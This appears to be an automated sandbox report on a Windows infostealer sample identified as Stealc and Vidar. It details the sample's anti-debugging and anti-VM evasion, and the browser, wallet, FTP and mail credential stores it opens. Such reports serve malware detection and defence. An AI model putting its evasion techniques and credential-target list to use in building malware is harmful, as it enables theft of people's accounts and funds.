Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4DD81 second address: D4DD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E788FD second address: E7891E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FB770CC1316h 0x0000000c jnc 00007FB770CC1306h 0x00000012 jmp 00007FB770CC130Ah 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7A4B5 second address: E7A4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190404 second address: 5190428 instructions: 0x00000000 rdtsc 0x00000002 mov si, 391Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB770CC130Ah 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB770CC130Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190428 second address: 5190469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB77110B476h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB77110B477h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92BBF second address: D92BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190C1B second address: 5190C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190C1F second address: 5190C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190C3B second address: 5190C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB77110B475h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190C62 second address: 5190C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BE1A0B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E1B7B5 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00994910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00994910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0098DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0098E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0098F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00993EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00993EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009816D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0098BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009938B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0098ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00994570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00994570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0098DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00981160 GetSystemInfo,ExitProcess,

0_2_00981160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: DGHDHIDG.0.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: DGHDHIDG.0.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: DGHDHIDG.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1591151333.00000000015A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DGHDHIDG.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: DGHDHIDG.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: DGHDHIDG.0.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: DGHDHIDG.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: DGHDHIDG.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: DGHDHIDG.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: DGHDHIDG.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: DGHDHIDG.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: DGHDHIDG.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: DGHDHIDG.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: DGHDHIDG.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: DGHDHIDG.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: file.exe, 00000000.00000002.1591151333.000000000155E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: DGHDHIDG.0.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: DGHDHIDG.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: DGHDHIDG.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: DGHDHIDG.0.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: DGHDHIDG.0.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: file.exe, 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: DGHDHIDG.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: file.exe, 00000000.00000002.1591151333.000000000155E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareY2
Source: DGHDHIDG.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: DGHDHIDG.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-57198
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-57195
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-57250
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-57210
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-57214
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58385

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CCF5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6CCF5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009845C0 VirtualProtect ?,00000004,00000100,00000000

0_2_009845C0

Source: C:\Users\user\Desktop\file.exe

0_2_00999860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00999750 mov eax, dword ptr fs:[00000030h]

0_2_00999750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009978E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_009978E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCCB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CCCB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCCB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CCCB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00999600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00999600

Source: file.exe	Binary or memory string: 0]#Program Manager
Source: file.exe, 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: #Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CCCB341 cpuid

0_2_6CCCB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00997B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00997980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00997980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00997850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00997850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00997A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00997A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1591151333.000000000157C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1400571869.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop (old)
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: \MultiDoge\
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1591151333.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.*

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1591151333.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1591151333.000000000157C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1400571869.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
